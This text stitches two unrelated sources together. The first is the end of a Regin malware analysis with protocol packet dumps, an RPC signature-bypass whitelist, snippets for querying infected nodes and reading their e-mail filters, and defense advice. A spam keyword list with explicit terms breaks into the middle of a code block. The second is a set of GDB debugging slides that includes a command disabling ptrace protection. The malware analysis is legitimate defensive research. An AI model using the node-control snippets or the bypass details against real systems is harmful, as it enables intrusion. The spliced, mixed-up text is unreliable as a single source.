0010 00 01 00 00 28 00 00 46 00 00 00 2c 01 00 00 28 ....(..F...,...(
0020 96 .
;; Transport module c373 (TCP)
0021 73 c3 s.
;; Connection string parameters
0023 01 24 00 00 00 00 00
;; Destination 192.168.226.235 on port 443 (0x1bb)
002a 31 39 32 2e 31 36 .s........192.16
0030 38 2e 32 32 36 2e 32 33 35 00 01 bb 8.226.235...
;; Connection string parameters
003c 00 00 00 00 ....
0040 01 00 00 00 02 01 00 00 00 01 01 01 00 00 ..............
The receiving node parse the message and start a listening thread for data accord-
ing to the data channel module and parameters specified in the initialization message.
Subsequent data communications are similarly encrypted with recipient public key
serialized RPC structures. If the digital signature is verified against a known trusted
public key, container xx module 000f, then the RPC is unserialized and queued for pro-
cessing. After processing the result is sent over the same data channel.
Continuing the previous example, the data would typically looks like the following
dump.
;; Ethernet II, Scr: Vmware_27:40:9e, Dst: Vmware_2f:e5:34
;; Internet Protocol V4, Src: 192.168.226.171, Dst: 192.168.226.235
;; Transmission Control Protocol, Src Port: 49210, Dst Port: https (443),
;; Seq: 1, Ack: 1, Len: 397
0000 00 50 56 2f e5 34 00 50 56 27 40 9e 08 00 45 00 .PV/.4.PV’@...E.
0010 01 b5 0c a3 40 00 80 06 a5 b7 c0 a8 e2 ab c0 a8 ....@...........
0020 e2 eb c0 3a 01 bb 56 d5 be a1 cf cf 8a e1 50 18 ...:..V.......P.
0030 40 29 4d a3 00 00 @)M...
;; Encrypted
0036 72 90 fc 0d 72 90 fd 84 73 b9 r...r...s.
[...]
01b0 65 33 18 a7 ae f6 35 f7 32 08 d0 a2 b4 81 7e e3 e3....5.2.....~.
01c0 6e 92 7e n.~
Figure 7: Pivot Between Victims
Decryption with the same hardcoded RC5 key yield the following data with a routing
header and encrypted payload.
;; Destination virtual IP (0.0.0.2), destination module (0009), destination
;; handler (11)
0000 02 00 00 00 09 00 11 .......
;; Source handler (13), source IP (0.0.0.1) and source module (0009)
0007 13 01 00 00 00 09 00 .......
[...]
;; Timestamp Fri Nov 28 06:05:56.044 2014
0020 a2 75 80 5f d1 0a d0 01 .u._....
[...]
;; Checksum
0038 b2 79 65 fd .ye.
;; Signing virtual IP (0.0.0.1)
003c 01 00 00 00 ....
[...]
;; Message length (0x119) signature version (0x1) and signature length (0x113)
0050 19 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0060 01 00 13 01 00 00 ......
;; Encrypted data
0066 91 e0 16 77 d6 7b 60 af f4 27 ...w.{‘..’
[...]
0170 65 c2 cf 98 ec c3 33 ff cb e.....3..
The routing header is in clear text so that messages can be relayed over the botnet
while enabling end to end encryption. The Figure 7 presents the configuration of a relay.
Indeed the node XX030bf15 has only a very few known host, in particular it does not
know the public key of XX9e0112. This nodes act as a bridge between the networks of
Victim A and C. As such it only needs the public key of the node from which it was
installed, XX020119. So intercepting this node does not compromise the communication
between Victim A and C because only routing header are processed by this node.
3.3 Digital Signature
Regin node are secure via asymmetric cryptography. Indeed one cannot connect to a
Regin node without proper authentication. A Regin node accept an RPC only from a
Source module ID Whitelisted routines
0000 Manage running modules: start, stop, list
0004 List modules, neighbors or connections
000e Edit crytographic parameters
000a Clean logs
0032 Configure inactivity triggers
0012 Neighborhood management
0010 RPC dump management
c372 Open TCP listener
0009 Authenticate, handshake
0008 Manage timeout, manage queued RPC
c41e Unknown
Figure 8: RPC Whitelist
remote node only if this RPC is signed with a known asymmetric key. Authentication
and cryptography is managed by the module 0x000f. The following example presents how
to list public keys of authorized nodes.
/* List known hosts */
HELPER->in.writeDWord(rpc, 1);
NTSTATUS status = HELPER->queueRPC(rpc, DST_IP, 0xf, 0x60);
However there is a a whitelist access control that enable to bypass the signature
validation process. The whitelist is composed of entries specifying a source module, a
destination handler and a destination module. A raw version of this whitelist is presented
in Figure 2. Table 8 below list the routines that can be called by a foreign module without
signature.
We observe that those functionality are related to monitoring or debugging. This
support the hypothesis of the existence of other Regin flavor with greater control over
standard nodes.
The whitelist can be obtained via the handler 0x1f of the module 0009.
/* Get the whitelist */
HELPER->queueRPC(rpc, DST_IP, 0x9, 0x1f);
4 Conclusion
Regin is developed with built-in access control and authentication. This can be compared
to ssh clients, the security of ssh is not lied to the client but to the key of the user.
Uncovering Regin framework and Regin does not directly impact the adversary security.
Indeed the security of the Regin infrastructure is lied to node secret key locally stored.
On the other hand, victims should be in possession of private keys enabling connection
to the Regin network. This aspect might be an explanation for a recurrently observed
TTP in Regin supported attacks: numerous victims nodes are quickly disinfected by the
adversary when the attack is discovered.
Regin is built on a convenient SOA develop framework aiming at rapid development
of remote services. This suggest that Regin operations might be supported by tiered
services where a team or a contractor responsible for providing this framework. Thus
several entities may have contracted “ Regin kits” from the same provider, making final
attribution difficult. Furthermore, such framework is likely to be delivered as source code
or intermediate language, as a result compilation timestamps might be an indicator about
the operator rather that the development contractor.
4.1 Defense Perspective
Regin is not the first step in an infection; it is a post-exploitation kit installed via an
initial implant. So Regin infection cannot be efficiently prevented and defense strategy
should rather focus on detection and hunting.
On IOCs. The subject malware cannot be easily detected via the usual IOC strategy.
For example Section 3.2 shows that botnet is organized with pivots where a third victim
can bridge two first victims. In this context IOC like IP addresses or domain names
are specific to each infection making IOC sharing less efficient. Similarly, [4] and [5]
underlined the staging mechanism implemented to load the main Regin components. The
first two stages are disposable and regularly change so that IOC on filenames and registry
are quickly obsolete.
Detection strategy should rather focus on design structures. Indeed, Regin has a
strong design with specific protocol and data structures. Such a detection strategy is
more sustainable than IOCs because changes in protocol or data structures would likely
cause backward compatibility issue on the adversary side.
Structural Detection. An example of such a detection strategy is presented in [1]
where detection targets the VFS file structure. However, the detection domain should be
extended from files to memory and to lower storage level such as inter-partition spaces
on disks.
Another structural detection can target network protocol. As presented in Section 3.2
the watermark “s h i t” in the initialization message is a low hanging fruit for network
detection. An IDS rule is presented in [3]. However, this watermark is not used on the
data channel and it can be removed from the initialization packet without much impact
on the the communication protocol.
On the other hand, Section 3.2 underlined that the protocol implement clear text
routing header enabling end-to-end encryption. A change in this header would impose
to upgrade all routing Regin nodes which may be difficult to manage for the adversary.
This routing header RC5 encrypted with a known key, so an IDS targeting this structure
should implement RC5 decryption over the first bytes of packet data. This is feasible even
on high traffic but dedicated computational power may be necessary.
Hunting. Figure 6 shows that infection may be very large. However such a network
map of the botnet is valuable to track all infected nodes. This network diagram is obtained
compiling the network connections in module 0009 container 01 and the public key list in
module 000f container 0001.
Backtracking the network structure with timeline correlation would provide interesting
information about how the botnet was deployed so that potential entry points and implant
are identified and removed too. Indeed, Regin is a post-exploitation malware installed from
an initial implant, so containment must target such implants too.
4.2 Attacker Perspective
Backdoor. Regin is a very mature malware however it features several weaknesses. First
the digital signature verification bypass presented in Section 3.3 looks like a backdoor for
master nodes. The security of this bypass relies on the module identifier which is a very
weak control. Indeed even if standard nodes are distributed with odd number identifier
only, module identifiers can be impersonated providing wider control to a counter-attacker.
However, it is understandable that wider control is necessary for specific nodes. This
should rather be implemented via specific public key distribution similarly to the master
nodes public keys. Ideally role base access control should be considered on top of the
authentication mechanism.
Watermark. The watermark “s h i t” in the initialization message is superfluous and
it is a low hanging fruit for IDS detection. It is superfluous because a second verification
is achieved on the header after RC5 decryption.
4.3 Counter-Intelligence Perspective
Observation. The first step toward the understanding of a Regin infection is to identify
the scale of the infection. Section 4.1 presented how to build a network map of the botnet.
Additionally, network flow can be identified activating logging mechanisms built-in the
malware. Logs are controlled by module 000b and module 0009 handlers aa-ac, b4-
bd. RPC dump are controlled by module 0011. Logs and dump are stored in specific
configurable VFS. Such an observation mechanism has the benefits of stealthiness as the
adversary own tool are leveraged in the process.
Adversary Intent. In order to anticipate new infections it is important to identify
the mobile of the adversary so that the related assets are specifically monitored. For
this purpose all the container present in the virtual file system need to be extracted and
analyzed. However, substantial preliminary technical analysis may be required. For ex-
ample, Microsoft Exchange e-mail collection filters are stored compressed in module d9d6
container 02. The following code allows to access the content of this container.
HELPER->createStream(module0001->instance, &stream);
/* Specify VFS ID */
HELPER->in.writeByte(stream, 1);
/* Specify container ID ModuleID|ContaineID */
HELPER->in.writeSizeStringBE(stream, "\xd6\xd9\x02",3);
/* Read from VFS */
HELPER->queueStream(stream, DST_IP, 7, 0xc);
/* Retrieve compressed output */
BYTE* buff;
size_t size = 0;
HELPER->getOut(stream, (void**)&buff, &size);
DWORD sizeout = 0x100;
do{
/* Inflate */
HELPER->seekBuffer1(stream, 0);
HELPER->in.writeDWord(stream, sizeout);
HELPER->in.writepSizeStringBE(stream, buff, size);
remember me
ride you
asian
autocad
banged
bed
bedroom
being larter
blowjob
breast
camel toe
cock
courtship
cum
delivery failure
delivery notification
delivery status notification
designer
dialost
discount
dreams
drugs
ecard
ejaculation
exposed herself
facsimile
flaccid
for healthgay
girth
greeting
hilarious
horny
hot babes
hot rod
huge
impotence
inches
invincible
jessica alba
longer
macho
make her
manhood
manliness
med
mightier
naked
orgasm
party
pleasure
porn
prada
pussy
rolex
satisfactionsex
she will
slut
spam
supplement
teat
the person
tight
timepieces
undeliverable
viagra
vyagra
watche
xmas
weight
chicks
dirty
pharmacy
hot deals
walmart
Google Alert
Press Review
Sources Say
Russian Headlines
Wires at
Delivery Status Notification
Radio News
Figure 9: E-Mail Filters: Blacklisted Keywords
status = HELPER->queueStream(stream, DST_IP, 0xd, 0x6);
sizeout *= 2;
}while (status == 0x1011 && sizeout != 0);
Those filters includes mail addresses and keywords. Filters also includes a blacklist
of keywords, mail including such keywords are not intercepted. Such information are
valuable in a counter-intelligence strategy.
Figure 9 presents some blacklisted keywords, the purpose is obviously SPAM filtering.
Such filtering is a double edged sword as explained in [2].
References
[1] Paul Rascagnres Eddy Willems. Regin, an old but sophisticated cyber espi-
onage toolkit platform. https://blog.gdatasoftware.com/blog/article/
regin-an-old-but-sophisticated-cyber-espionage-toolkit-platform.html ,
2014.
[2] Paul Ducklin. Do terrorists use spam to shroud their se-
crets? https://nakedsecurity.sophos.com/2015/01/19/
do-terrorists-use-spam-to-shroud-their-secrets , 2014.
[3] EmergingThreats. Regin rules (requries apr module) and flash detection up-
dates. https://github.com/EmergingThreats/et-luajit-scripts/blob/master/
luajit.rules .
[4] Kaspersky Lab Report. The regin platform nation-state ownage of gsm net-
works. https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_
Regin_platform_eng.pdf , 2014.
[5] Symantec Security Response. Regin: Top-tier espionage tool enables stealthy surveil-
lance. https://www.symantec.com/content/en/us/enterprise/media/security_
response/whitepapers/regin-analysis.pdf , 2014.
Acknowledgment. I’d like to thank Alexandre, Andrzej, Bruce, Christophe, Damien,
Michal, Sergiusz and Yann for their awesome work on that malware.  
Debugging with GDB
Dr. Ulrich Weigand
<ulrich.weigand@linaro.org >
<ulrich.weigand@de.ibm.com >
  
Agenda
●Running a program under GDB
●Inspecting and modifying program state
●Automating debugging tasks
●Debugging optimized code
●Debugging multi-threaded programs
●Debugging several programs simultaneously
●Post-mortem debugging using core files
●Remote debugging
●Using tracepoints to debug non-intrusively
  
Running a program under GDB
Application
Source codeApplication
Executable
CompilerSystem
Header filesSystem
LibrariesApplication
GDBptrace
  
Starting GDB
●Start up GDB to debug a program
●“gdb executable”
●“gdb –args executable arguments”
●Or else just start “gdb” and then use commands
–“file executable”, “set args arguments”
●Then start up program via “run”
–May want to set breakpoints first
●Attach GDB to an already running process
●“gdb executable pid”
●Or else just “gdb executable” and then “attach pid”
●Process will be stopped wherever it happens to execute
●Note: On Ubuntu, attaching is disabled by default.  To enable:
–echo 0 > /proc/sys/kernel/yama/ptrace_scope
  
Breakpoints
●“break location” will stop your program just before it executes any 
code associated with location.
–A single source location may refer to multiple instruction start addresses (e.g. a 
function inlined into multiple callers).  GDB will automatically  set breakpoints on all 
those locations.
–A single symbol name may refer to multiple source locations (e.g. a overloaded C++ 
function).  GDB will by default  set breakpoints on all those locations.  This can by 
disabled via “set multiple-symbols ask”.
–If location cannot currently be resolved, GDB asks whether to keep the breakpoint 
pending for future re-evaluation.  This behavior can be modified via “set breakpoint 
pending on” or “set breakpoint pending off”.
–All breakpoint locations are re-evaluated whenever a shared library is loaded or 
unloaded.
●“tbreak location” enables a breakpoint only for a single stop.
●“condition bnum expression” causes GDB to only stop at the 
breakpoint if the expression evalutes to non-zero.
  
Watchpoints
●“watch expression” will stop your program whenever the value 
of expression changes.
●GDB will use hardware support to implement watchpoints efficiently if 
possible; otherwise GDB will continue silently single-stepping until the 
value of expression has changed.
●The whole expression is constantly re-evaluated; for example “watch 
p->x” will trigger both if the value of the “x” member of structure “p” 
currently points changes, and if “p” is reassigned to point to another 
structure (if that structure's “x” member holds a different value).
●Once a variable refered to by expression goes out of scope, the 
watchpoint is disabled.
●Use “watch -location expression” to instead evaluate expression only 
once, determine its current address, and stop your program only if 
the value at this address changes.
  
ARM hardware watchpoints
●Feature set
●Hardware watchpoints
–Trap when a pre-defined memory locations is modified
–Used to implement “watch” family of commands in GDB
●Hardware breakpoints
–Trap when execution reaches a specified address
–Used to implement “hbreak” family of commands in GDB
–Useful in particular to set breakpoints in non-modifyable code (e.g. ROM)
●Current status
●Hardware breakpoint/watchpoint support added to Linux kernel 2.6.37 
●Support exploited by GDB 7.3
●Hardware pre-requisites
●Cortex-A8: limited HW support, not currently exploited by Linux kernel
●Cortex-A9: improved HW support, Linux kernel supports one single HW watchpoint
●Cortex-A15: full HW support, Linux (3.2) supports multiple HW watchpoints
  
Catchpoints
●“catch throw” / “catch catch” will stop your program 
when a C++ exception is thrown or caught.
●“catch fork” / “catch vfork” / “catch exec” will stop your 
program when it forks or execs.
●“catch syscall [name]” will stop your program when it is 
about to perform a system call.
●“catch load [regexp]” / “catch unload [regexp]” will stop 
your program when a shared library is loaded or 
unloaded.
●Note that some of those commands may not be 
available on all platforms.
  
Continuing execution
●Continuing and stepping
●“continue” resumes program execution.
●“step” or “next” single-step to the next source line (stepping 
into/over function calls).
●“finish” continues until the current function scope returns.
●“until” continues until a location in the current function scope is 
reached (or it returns).
●“advance” continues until a location is reached for the first time.
●Skipping over functions and files
●“skip function” steps over any invocation of function, even when 
using “step”.  (Useful for nested function calls.)
●“skip filename” steps over all functions in the given file.
  
Inspecting program state
●Examining source files
●“list” prints lines from a source file.
●“search [regexp]” searches a source file.
●“directory” specified directories to be searched for source files.
●Source and machine code
●“info line linespec” shows which addresses correspond to a 
source line
●“disassemble” shows machine code.
●Use “set disassemble-next-line on” to automatically disassemble 
the current source line whenever GDB stops.
  
Inspecting program state
●Examining data
●Use “print expression” to evaluate an expression in the source language 
and print its value.
●Use “print/f expression” to use output format “f” to format the value 
(instead of its natural type).
–Print as integer (various formats): “x”, “d”, “u”, “o”, “t”
–Print as floating-point value: “f”
–Print as address: “a”
–Print as character or string: “c”, “s”
●Use “x[/f] address” to print the value at address in the given format.
–Additional format “i” to print disassembled machine instruction
●Use “display[/f] expression” to automatically re-evaluate and print 
expression every time the program stops.
–Always disassemble the current instruction via:  display/i $pc
  
Inspecting program state
●Examining the stack
●GDB will use current register values and memory 
contents to re-construct the “call stack” - the series of 
function invocations that led to the current location
●“backtrace” show a backtrace of the entire call stack
●“frame n” selects the n-th frame as “current” frame
●“up [n]” / “down [n]” moves up or down the call stack
●“info frame” describes the current frame
●“info args” / “info locals” prints the function 
arguments and local variables for the current frame
  
Backtrace support: Background
Frame 3
Register SetFrame 2
Register SetFrame 0
Register Set
UnwindFrame 1
Register Set
UnwindUnwind
PC
PCPCUnwind
Instructions
MemoryKernel / ptrace interface
PCUnwind
Instructions
Unwind
Instructions
End of stack●Basic algorithm
●Start with initial register set 
(frame #0)
●Extract PC from register set
●Determine register unwind 
instructions at PC
–“Restore PC from LR”
–“Add 128 to SP”
–“Restore R8 from memory at 
location (old) SP + 80”
–“Register R10 is unchanged”
–“Register R2 cannot be unwound; 
its prior value is lost”
●Given old register set and 
memory contents, apply unwind 
instructions to construct register 
set at next frame (frame #1)
●Repeat until uppermost frame is 
reached
  
Backtrace support on ARM
●How to determine unwind instructions at PC
●Use DWARF-2 Call Frame Instructions (.debug_frame; on non-ARM also .eh_frame)
●Use ARM exception table information (.ARM.exidx / .ARM.extbl)
●Disassemble start of function containing PC and interpret prologue
●Hard-coded special cases (e.g. signal return trampolines, kernel vector page stubs)
●Challenges on ARM
●No .eh_frame section means no DWARF CFI in the absence of debug info
●ARM exception tables were not supported in GDB
●Glibc assembler code was not (always) annotated with ARM exception tables
●Prologue parsing did not handle the Thumb-2 instruction set
–Note that Thumb-2 is the default on current Ubuntu distributions
●Current status
●Support for all missing features added
●No GDB test case fails due to unwind problems
–This is true even in the absence of system library debug info packages
  
Modifying program state
●Assignment to variables
●Use “print var = expr” or “set variable var = expr” to store the value of 
expr into the program variable var
●Continuing at a different address
●Use “jump linespec” or “jump *address” to continue execution elsewhere
●Returning from a function
●Use “return” to cancel execution of the current function and immediately 
return to its caller
●Use “return expr” to provide a return value
●Giving your program a signal
●Use “signal { signr | signame  }” to resume execution where your 
program stopped, but immediately deliver a signal
  
Calling program functions
●Use cases
●Change program state (e.g. reset, initialize)
●Pretty-print large data structures
●Unit-test behavior of a single function
●Invocation
●Use “print expr” or “call expr” where expr contains a function call
●GDB will arrange for a stack frame to be allocated and argument values to be 
prepared, and then continue execution at the called function
●Once execution completes normally, a temporary breakpoint will be hit; GDB resumes 
control and extracts the return value
●Caveats
●If execution of the called function stops (due to a breakpoint, signal, or exception), 
the function invocation will remain on the stack
●Use “set unwindonsignal on” and/or “set unwind-on-terminating-exception on” to 
have GDB instead unwind the stack
  
Automating debugging tasks
●GDB command language is powerful enough to 
“program” GDB to automate debugging tasks
●This includes features like:
●Convenience variables
●User-defined commands
●Conditionals and loops
●Command files
●Breakpoint commands
●Dynamic prints
  
Convenience variables
●Used to hold values that can be reused later
●Exist only in GDB; their use does not affect the debuggee
●Related commands
●Convenience variables idenfied by “$” prefix
●Use “set $variable = expr” to set them
–No predefined type; can hold values of any type
●Use “show convenience” to display all variables
●Some predefined “magic” convenience variables
●$_ / $__ automatically set to last address examined and its value
●$_exitcode set to exit code when program terminates
●$_siginfo set to signal info when program receives a signal
  
User-defined commands
●Named sequence of regular 
GDB commands
●Useful e.g. to traverse long 
data structures
●Up to 10 named arguments 
($arg0 .. $arg9)
●Can use convenience variables
●Supports conditions and loops
–if ... else ... end
–while ... loop_continue ... 
loop_break ... end(gdb) define factorial
Type commands for definition 
of “factorial”.
End with a line saying just 
“end”.
>set $fact=1
>set $n=$arg0
>while $n>1
  >set $fact=$fact*$n
  >set $n=$n-1
  >end
>print $fact
>end
(gdb) factorial 5
$30 = 120
  
Other command sequences
●Command files
●Format: sequence of GDB commands
●Can be used via “source filename” command
●Automatically execute command file
●gdb < filename
●Execute commands at GDB initialization
●System-wide and private init command files (.gdbinit)
●Command line options “-iex” or “-ix” execute single command 
or script before  .gdbinit
●Command line options “-ex” or “-x” execute single command 
or script after .gdbinit
  
Breakpoint actions
●Breakpoint commands
●Command sequence associated with breakpoint
●Use “commands [breakpoint-range] ... end”
●Executed every time the breakpoint hits
●May automatically continue execution
●Dynamic printf
●Shortcut to combine a breakpoint with formatted printing of program data
●Same effect as if you had inserted printf calls!
●Use “dprintf location, template, expression, ...”
●Example: dprintf test.c:25, “at line 25: glob=%d”, glob
–Prints the value of “glob” every time line test.c:25 is hit
●Default output to GDB console
–May also call debuggee's printf (or related routine) instead
  
Debugging optimized code
●GDB can debug code compiled with optimizations enabled
●However, the compiled code is no longer in 1:1 correspondence to your 
source code, which may cause various irritations
●Still need to compile with -g to generate debug data
–Note that use of -g does not  disable any optimizations; generated code should be 
absolutely identical (with GCC)
–Recent compilers generate much more detailed debug data to allow better 
debugging of optimized code
●Typical problems include
●Assembler instruction sequence not in line with source code
●Variables optimized away
●Function inlining or tail-call optimizations
  
Variable locations
●What is the problem?
●In optimized code, there is generally no fixed location (on the stack or in a register) 
where the current value of a local variable is stored
●This makes it hard for a debugger to show the variable's value (or allow to modify it)
●How does GDB handle it?
●Modern debug data allows GDB to find a variable at different locations throughout the 
execution of a function
●If the variable is not stored anywhere  debug data can still tell GDB how to synthesize the 
value it ought to hold at the current location
●If none of this is the case, at least GDB should reliably recognize that the variable's value 
is currently not available
●As a special case for function arguments: Even if the current  value is unavailable, GDB 
may still be able to construct its “entry” value (i.e. the value the parameter held at the 
time the function was called) by inspecting the caller's  stack frame
●Limitations include
●Even with recent compilers, debug data still shows room for improvement ...
  
Function inlining
●What is the problem?
●Instead of generating a call to a subroutine, the compiler places the subroutine body 
directly at its call site, subject to further optimizations
●Source-level debugging shows lines of the subroutine intermixed with the caller
●How does GDB handle it?
●GDB will pretend that the call site and the start of the inlined function are different 
instructions
●Source-level stepping will first step onto the call site, and then to the first line of the 
inlined subroutine
●Backtraces will show a synthesized frame representing the inlined subroutines including 
its arguments (if available)
●Limitations include
●You cannot set a breakpoint on the call site; execution will stop showing the first line of 
the inlined subroutine instead
●GDB is unable to show the “return value” when stepping out of an inlined subroutine 
using the “finish” command
  
Tail-call optimization
●What is the problem?
●If the last action of a function B is a call to another routine C, the compiler 
may use a “jump” instruction instead of a “call” followed by “return”
●If B was in turn called from function A, a backtrace will show A as C's caller; 
B is lost
●How does GDB handle it?
●GDB tries to detect tail call situations by noticing that A has no call site 
calling C, but it does have a call site calling B, which in turn contains a tail 
call site invoking C
●GDB will show a synthesized frame for B to represent the tail call situation
●Limitations include
●In more complex situations, there is no unambigous call site path linking C 
to its (only possible) caller
●In particular, tail recursion  is always ambigous
  
Debugging multithreaded programs
●GDB will automatically detect all threads of the current process (in 
cooperation with the operating system and thread library)
●On GNU/Linux, GDB will use
–The libthread_db library to access state information held by the process' libpthread instance, 
to retrieve the initial thread list at attach time, as well as  each threads' pthread_t value and 
thread-local storage block
–The kernel's ptrace events mechanism to receive notification on thread creation and 
termination
●“info threads” shows existing thread
●“thread nr” selects current thread
●Most GDB commands implicitly operate on this thread
●“thread apply nr|all command”
●Invoke GDB command on another (set of) threads
●“break ... thread nr [if ...]”
●Trigger breakpoint only while executing specified thread
  
Multithreaded execution: all-stop
●By default, GDB will stop all threads whenever the program stops
●Advantage: While you work on the GDB prompt to inspect your program's 
state, it will not change due to actions of other threads
●Disadvantage: Larger “intrusion” on the system, timing-sensitive operations 
may be disturbed more easily
●Conversely, whenever you restart your program even just for single-
stepping , GDB will restart all threads
●Advantage: No possibility of deadlocks introduced by GDB
●Disadvantage: While single-stepping a thread, GDB may suddenly switch 
focus to another thread (e.g. because it hit a breakpoint)
●Use “set scheduler-locking on” to modify this behavior
●GDB will then restart only the current  thread, all others remain stopped
●Use “set scheduler-locking step” to restart only current thread when using the 
“step” or “next” commands, but restart all threads when using “continue”
  
Multithreaded execution: non-stop
●In “non-stop” mode, you can freely select which threads should run 
and which should stop
●When a thread runs into a breakpoint or some other stop condition, only  
this thread is halted
–Note that it can still happen that more that one thread is stopped at the same time
●Execution commands like “step”, “next”, or “continue” only restart the 
current thread
–Note that “set scheduler-locking” has no effect in this mode
●Use “continue -a” to restart all stopped threads
●You may use “thread nr” to switch to a currently running thread, but 
execution control commands (and some others) will not work there
●Use “set non-stop on” to enable non-stop mode
●Must be used before  starting a program (or attaching to a program); has 
no effect on already started or attached programs
  
Background execution
●Use “set target async on” to enable asynchronous execution mode
●In asynchronous mode, GDB allows to run certain execution control 
commands “in the background”
●To trigger background execution, use “&” at the end of the command line
●GDB will then immediately provide another command prompt
●Commands that support background execution:
–Run, attach, step, stepi, next, nexti, continue, until, finish
●To interrupt a program executing in the background, use “interrupt”
●In non-stop mode, “interrupt” only stops the current thread
–Use “interrupt -a” to stop all threads
●Note that Ctrl-C can be used to interrupt a program executing in the foreground
●Note that asynchronous mode and non-stop mode are independent
●Still it is often useful to enable both simultaneously
  
Debugging several programs
●“Inferior”
●Encapsulates state of execution of a program
●Usually corresponds to a process
–However, the inferior may be created before a process starts, and/or live on after a 
process has terminated
●Most GDB commands (implicitly) operate on a designated “current” inferior
●Related GDB commands
●“info inferiors” - list all inferiors managed by GDB
●“inferior infno” - switch current inferior
●“add-inferior [-exec filename]” - add new inferior
●“clone-inferior” - create copy of current inferior
●“remove inferior” - remove inferior (must have terminated)
–May use “detach inferior infno” or kill inferior infno”
  
Multi-program execution
●All-stop mode
●By default, only one inferior may be executing at any given time
–“continue” etc. only affect the current inferior
●Use “set schedule-multiple on” to allow multiple inferiors to be 
executing simultaneously
–If any thread of any inferior stops, GDB will stop all threads of all inferiors
●Non-stop mode
●Multiple inferiors may execute simultaneously
●Threads of any inferior may be stopped or running independently 
of each other
●In asynchronous mode, a new inferior may be started using “run &” 
while others are already running
  
Debugging across “fork”
●Debugging only one process
●By default, GDB continues to debug parent process after it executed 
“fork”; child runs freely
●Use “set follow-fork-mode child” to tell GDB to debug the child 
process; parent  then runs freely
●Debugging both  parent and child
●Use “set detach-on-fork off” to keep GDB debugging both processes 
(in separate inferiors)
●follow-fork-mode still determines whether parent or child is 
considered current  inferior after fork
●If multiple inferiors may run (either non-stop mode or all-stop 
mode with “set schedule-multiple on”), both parent and child will 
continue to run; otherwise only current inferior will do so
  
Debugging across “exec”
●By default, GDB will reset the current inferior to refer 
to the newly exec'd program
●“run” will restart the new  program, not the original
●The symbol table of the old program is discarded and the 
symbol table of the new program is loaded
–All breakpoints are re-evaluated against the new table
●Use “set follow-exec-mode new” as alternative
●GDB will create a new inferior to track execution of the 
process after “exec”; this will behave as above
●The original inferior remains unchanged
–Use “run” in this context to restart the original program
  
Post-mortem debugging
●What is a core file?
●Variant of the ELF file format
●Contains a process' memory image
–Unmodified memory-mapped file contents will be omitted
●Also contains register contents
–In multi-threaded applications, registers of all threads
●How does GDB use core files?
●“gdb executable corefile” tells GDB to operate on a core file instead of a 
live process
●GDB reads registers and memory from the core
●All commands that examine debuggee state work just the same as when 
debugging a live process
●Execution control (step, continue, ...) is disabled
  
How to create core files
●When an application crashes
●The kernel will automatically create a core file
●Needs to be allowed via “ulimit -c unlimited”
●File will be called “core” or “core.pid”
–Can be configured via:
●/proc/sys/kernel/core_pattern
●/proc/sys/kernel/core_uses_pid
●On a live application
●Use GDB to start the application or attach to it
●Create core file via “generate-core-file filename”
●Application will continue to run afterwards!
●Utility “gcore” encapsulates this process
  
VFP/NEON register sets
●Floating-point / vector registers on ARM
●Past architectures did not specify floating-point or vector registers; some 
implementations provided those via co-processor extensions
●ARMv7 specifies VFPv3 and Advanced SIMD (“NEON”) extensions
–VFPv3-D16: 16 64-bit registers / 32 32-bit registers
–VFPv3-D32: 32 64-bit registers
–NEON: VFPv3-D32 registers re-interpreted as 16 128-bit registers
●Current status
●Access VFP/NEON register sets in native/remote debugging:
Supported with Linux kernel 2.6.30 / GDB 7.0
●Access VFP/NEON registers sets in core files:
Supported with Linux kernel 3.0 / GDB 7.3
  
Remote debugging
Application
Source codeApplication
Executable
Cross-CompilerTarget
Header filesTarget
LibrariesApplicationCross-GDB
Application
ExecutableSystem
LibrariesTarget
LibrariesGDBserver
Host Targetptraceremote 
protocol
copy
  
Starting GDB for remote debugging
●On the target
●“gdbserver :port executable arguments”
–Starts up gdbserver and the program to be debugged (stopped at the first instruction)
●“gdbserver –attach :port pid”
–Starts up gdbserver and attaches to process PID (which will be stopped)
●On the host
●Start via “gdb executable” as usual
●Provide location of target libraries e.g. via “set sysroot”
●Establish target connection via “target remote targethost:port”
–GDB will now show program already running, but in stopped state
●Start debugging e.g. via “break main” and “continue”
●Debugging multiple programs at the same time
●Start up gdbserver in multi-program mode “gdbserver –multi :port”
●On the host, connect to target via “target extended-remote targethost:port”
●You can now start up a program as usual via “run” or “attach”
  
Remote debugging challenges
●GDB accesses application binary / target libraries on host
●Assumes these are identical copies of files on target
–Debugging will (silently) fail if that assumption is violated
●Solution: Have gdbserver access files on target
–Contents forwarded via remote protocol
●Status: Implemented; enable via “set sysroot remote:”
●Native target and gdbserver target feature sets differ
●Both implement similar functionality but do not share code
●Some native features missing from remote debugging (and vice versa)
●Long-term solution: Code re-factoring to allow re-use of identical code base
●For now: Narrow gap by re-implementing missing gdbserver features
–Support hardware break-/watchpoints
–Disable address space randomization
–Core file generation and “info proc”
  
Trace data collection
●Problem
●Inspecting process state interactively takes time, while the process remains stopped
●May cause trouble when debugging timing-sensitive applications
●Solution
●Collect interesting pieces of process state on the fly, without disturbing timing much
●Interactively inspect collected data later
●Basic mechanism
●(Offline) Define tracepoints describing data to be collected
●(Online) Run trace experiment, collecting data
●(Offline) Find and inspect collected trace data
●Limitations
●Only supported with remote debugging, and if supported by remote agent
●Currently not supported by gdbserver on ARM (but on x86)
  
Defining tracepoints
●Use “trace” command to define tracepoints
●Works just like “break” command
●Tracepoints show up in breakpoint list, can be manipulated like breakpoints
●Some targets support extra flavors
–“ftrace” defines “fast” tracepoints
●Collection performed in-process instead of via trap
–“strace” enables “static” tracepoints
●Pre-built into the target program (e.g. UST)
●Use “collect” command to define data to be collected
●Used in tracepoint command list created via “actions”
–Similar to breakpoint command list created via “commands”
●“collect expr” collects value of expression
●Special shortcuts “collect $regs”, “collect $args”, “collect $locals”
●“while-stepping nr” single-steps several lines, repeatedly collecting data
  
Running trace experiements
●Use “tstart” to start trace experiment
●Use “tstop” to stop trace experiment
●Use “tstatus” to query status of  experiment
●Use “set disconnected-tracing on” to keep trace 
experiment running even when GDB is 
disconnected from the target
●While the trace experiment runs, every time a 
tracepoint hits, a trace snapshot containing 
collected data is created
  
Using collected trace data
●Use “tfind ...” to focus GDB on a trace snapshot 
●As long as GDB is focused on a tracepoint, all GDB commands 
will behave as if we were currently debugging the program at the 
time the snapshot was taken
●However, only such data as was collected will be available for 
inspection; GDB will report other data as “unavailable”
●Some variants of the tfind command include
●“tfind n” - focus on n'th snapshot
●“tfind tracepoint num” - next snapshot collected at  tracepoint
